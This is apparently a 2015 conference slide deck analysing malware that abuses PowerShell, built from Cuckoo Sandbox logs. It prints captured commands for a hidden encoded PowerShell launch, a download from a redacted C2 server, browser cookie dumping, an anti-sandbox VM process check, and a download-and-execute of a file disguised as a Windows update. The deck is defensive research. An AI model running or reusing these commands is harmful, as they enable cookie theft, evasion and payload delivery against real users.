This document discusses malware samples that abuse PowerShell on Windows systems. It provides examples of malware behaviors like generating batch files to execute PowerShell scripts, downloading data from command and control servers, dumping browser cookies, checking for sandbox detection, and downloading/executing files. The document concludes that PowerShell is commonly used by malware in a similar way that AutoIt is abused, and that the focus should be on malicious behaviors rather than the scripting language itself.

1. Fourteenforty Research Institute, Inc.
1
Fourteenforty Research Institute, Inc.
Malware armed with
PowerShell
FFRI,Inc.
http://www.ffri.jp
Ver 2.00.01
Junichi Murakami

2. Fourteenforty Research Institute, Inc.
2
Introduction
• We have been continuously providing FFRI Dataset(2013-) to
CSS/MWS which is an academic symposium held in Japan
– http://www.iwsec.org/mws/2014/en.html
• The dataset is a set of log files which is generated by Cuckoo
Sandbox for approximately 3,000 malware randomly sampled
from our collection since Jan to Apr each year
• We confirmed a few activities that malware abusing
PowerShell on their executions in the dataset
• In this slides, we introduce those activities

3. Fourteenforty Research Institute, Inc.
Related works
• Black Hat USA 2014
– INVESTIGATING POWERSHELL ATTACKS
Ryan Kazanciyan, Matt Hastings at FireEye
• RSA Conference 2015 San Francisco
– HACKING EXPOSED: BEYOND THE MALWARE
George Kurtz, Dmitri Alperovitch, ELIA ZAITSEV at CrowdStrike
3

4. Fourteenforty Research Institute, Inc.
The samples
# sha1 Detection
Rate on VT
Analysis
Date on VT
1 46070ec0b7d4e1b7d6d8152bb1d1e6e7475c5b20 75% 2015-05-04 10:58:57 UTC
2 b6ad75833fc0bafbfdd8143f27d33b5b36553ba2 75% 2015-04-09 15:06:50 UTC
4

5. Fourteenforty Research Institute, Inc.
How we confirmed
• As we mentioned above, the dataset is generated by Cuckoo
• Therefore we could see PS relevant activities via API calls below
– NtWrite
Creating a batch file and writing encoded PS scripts into the file
– NtCreateUserProcesss / ShellExecuteW
Executing PS scripts with powershell.exe
5

6. Fourteenforty Research Institute, Inc.
Generating a batch file
6
NtWriteFile(
Buffer:@shift^M powershell -nop -windows hidden -noni -enc
JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGU
AcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBj
ACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsA,
FileHandle:0x000000f8
)
Base64 encoded
-noprofile –noninteractive -encodedcommand

7. Fourteenforty Research Institute, Inc.
Downloading data from C2 server
ShellExecuteExW(
Show:0,
Parameters:-Command "(New-ObjectSystem.Net.WebClient).DownloadData(DEFACED);“,
FilePath:c:¥windows¥system32¥windowspowershell¥v1.0¥¥¥powershell.exe
)
7

8. Fourteenforty Research Institute, Inc.
Dumping cookies
8
NtCreateUserProcess(ProcessDesiredAccess:0x02000000,
CommandLine:c:¥windows¥system32¥windowspowershell¥v1.0¥¥¥powershell.exe -
Command "dir ([system.environment]::GetFolderPath('Cookies')+'¥*.txt')|Get-Content >>
'C:¥Users¥admin¥AppData¥Local¥Temp¥lbdatdp.txt'",
ThreadName:, ThreadHandle:0x0000019c, ThreadDesiredAccess:0x02000000,
ImagePathName:c:¥windows¥system32¥windowspowershell¥v1.0¥powershell.exe,
ProcessHandle:0x000001a4, ProcessFileName:)
NtCreateUserProcess(ProcessDesiredAccess:0x02000000,
CommandLine:c:¥windows¥system32¥windowspowershell¥v1.0¥¥¥powershell.exe -
Command "dir ([system.environment]::GetFolderPath('Cookies')+'¥Low¥*.txt')|Get-Content
>> 'C:¥Users¥admin¥AppData¥Local¥Temp¥lbdatdp.txt'",
ThreadName:, ThreadHandle:0x00000224, ThreadDesiredAccess:0x02000000,
ImagePathName:c:¥windows¥system32¥windowspowershell¥v1.0¥powershell.exe,
ProcessHandle:0x00000270, ProcessFileName:)

9. Fourteenforty Research Institute, Inc.
Counting the number of matched domains
9
NtCreateUserProcess(ProcessDesiredAccess:0x02000000,
CommandLine:c:¥windows¥system32¥windowspowershell¥v1.0¥¥¥powershell.exe -
Command "((Select-String -Path
'C:¥Users¥admin¥AppData¥Local¥Temp¥lbdatdp.txt','C:¥Users¥admin¥AppData¥Local¥Goog
le¥Chrome¥User
Data¥Default¥Cookies','C:¥Users¥admin¥AppData¥Local¥Google¥Chrome¥User
Data¥Default¥History' -pattern DEFACED(domains) |group pattern|select name)|Measure-
Object).count",
ThreadName:, ThreadHandle:0x00000268, ThreadDesiredAccess:0x02000000,
ImagePathName:c:¥windows¥system32¥windowspowershell¥v1.0¥powershell.exe,
ProcessHandle:0x0000026c, ProcessFileName:)

10. Fourteenforty Research Institute, Inc.
Anti-sandbox
10
NtCreateUserProcess(
ProcessDesiredAccess:0x02000000,
CommandLine:c:¥windows¥system32¥windowspowershell¥v1.0¥¥¥powershell.exe -
Command "(Get-Process|Select-String -pattern
VBoxService,VBoxTray,Proxifier,prl_cc,prl_tools,vmusrvc,vmsrvc,vmtoolsd).count",
ThreadName:,
ThreadHandle:0x00000180,
ThreadDesiredAccess:0x02000000,
ImagePathName:c:¥windows¥system32¥windowspowershell¥v1.0¥powershell.exe,
ProcessHandle:0x00000254,
ProcessFileName:
)

11. Fourteenforty Research Institute, Inc.
Download & exec
11
ShellExecuteExW(
Show:0,
Parameters:-Command "(New-Object
System.Net.WebClient).DownloadFile(DEFACED,'C:¥ProgramData¥¥Microsoft-
KB503492.exe');(New-Object -com Shell.Application).ShellExecute('C:¥ProgramData¥¥Microsoft-
KB503492.exe');",
FilePath:c:¥windows¥system32¥windowspowershell¥v1.0¥¥¥powershell.exe
)

12. Fourteenforty Research Institute, Inc.
Conclusions
• Nothing special, just doing typical malicious activities using PS
• Currently, PS is natively hosted on Windows environments
• Do we have to check whether all parameters for PS.exe
and scripts are malicious?
– This situation is similar with malware built with AutoIt
• We should more focus behaviors of malware than ever
12

13. Fourteenforty Research Institute, Inc.
13
Thank you !
FFRI,Inc.
http://www.ffri.jp
Junichi Murakami
murakami@ffri.jp